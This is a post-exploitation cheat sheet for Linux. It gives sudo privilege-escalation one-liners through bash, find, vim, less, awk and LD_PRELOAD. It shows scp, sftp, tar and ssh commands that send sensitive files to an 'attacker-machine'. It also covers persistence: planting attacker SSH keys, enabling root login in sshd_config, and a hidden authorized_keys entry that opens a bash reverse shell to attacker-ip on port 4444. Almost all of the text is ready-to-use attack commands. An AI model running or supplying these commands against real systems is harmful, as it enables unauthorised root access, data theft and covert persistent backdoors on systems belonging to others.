Post-Exploitation

Check Sudo Permissions:

sudo -l

This command lists the commands the current user can run with sudo.

Exploit Sudo Permissions:

sudo /bin/bash

If the user can run bash with sudo, this command will provide a root shell.

Exploit Sudo with Wildcards:

sudo find / -name "*.txt" -exec /bin/bash \;

If the user can run find with sudo, this command will execute a root shell.

Exploit Sudo with Environment Variables:

sudo LD_PRELOAD=/path/to/malicious.so program

If the user can run a program with sudo and the env_keep option includes LD_PRELOAD, this command will load a malicious shared object.

GTFOBins:

GTFOBins is a curated list of Unix binaries that can be exploited to bypass local security restrictions. Check GTFOBins for specific sudo exploitation techniques:

# Example: Exploiting sudo vim
sudo vim -c ':!/bin/bash'

# Example: Exploiting sudo less
sudo less /etc/passwd
!/bin/bash

# Example: Exploiting sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'

SCP Data Transfer:

scp /path/to/sensitive/file username@attacker-machine:/path/to/destination

This command copies a file from the compromised system to the attacker's machine using SCP.

SFTP Data Transfer:

sftp username@attacker-machine
put /path/to/sensitive/file
exit

These commands transfer a file from the compromised system to the attacker's machine using SFTP.

Tar and SCP:

tar -czf sensitive_data.tar.gz /path/to/sensitive/directory
scp sensitive_data.tar.gz username@attacker-machine:/path/to/destination

These commands compress a directory and transfer it to the attacker's machine using SCP.

SSH Command Execution:

cat /path/to/sensitive/file | ssh username@attacker-machine "cat > /path/to/destination"

This command pipes the contents of a file to the attacker's machine using SSH.

SSH Key Installation:

mkdir -p ~/.ssh
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys

These commands add the attacker's SSH public key to the authorized_keys file, allowing persistent access.

SSH Configuration Modification:

echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config
service ssh restart

These commands modify the SSH configuration to allow root login and password authentication.

SSH Backdoor Key:

cd /tmp
ssh-keygen -t rsa -b 4096 -f backdoor_key
cat backdoor_key.pub >> ~/.ssh/authorized_keys
chmod 600 backdoor_key
# Transfer backdoor_key to attacker machine

These commands generate a new SSH key pair and add the public key to the authorized_keys file, allowing persistent access.

SSH Authorized Keys Command:

echo 'command="bash -c \"bash -i &>/dev/tcp/attacker-ip/4444 0>&1\"",no-pty ssh-rsa AAAA...' >> ~/.ssh/authorized_keys

This command adds a command restriction to an SSH key that executes a reverse shell when the key is used, while still allowing normal SSH authentication.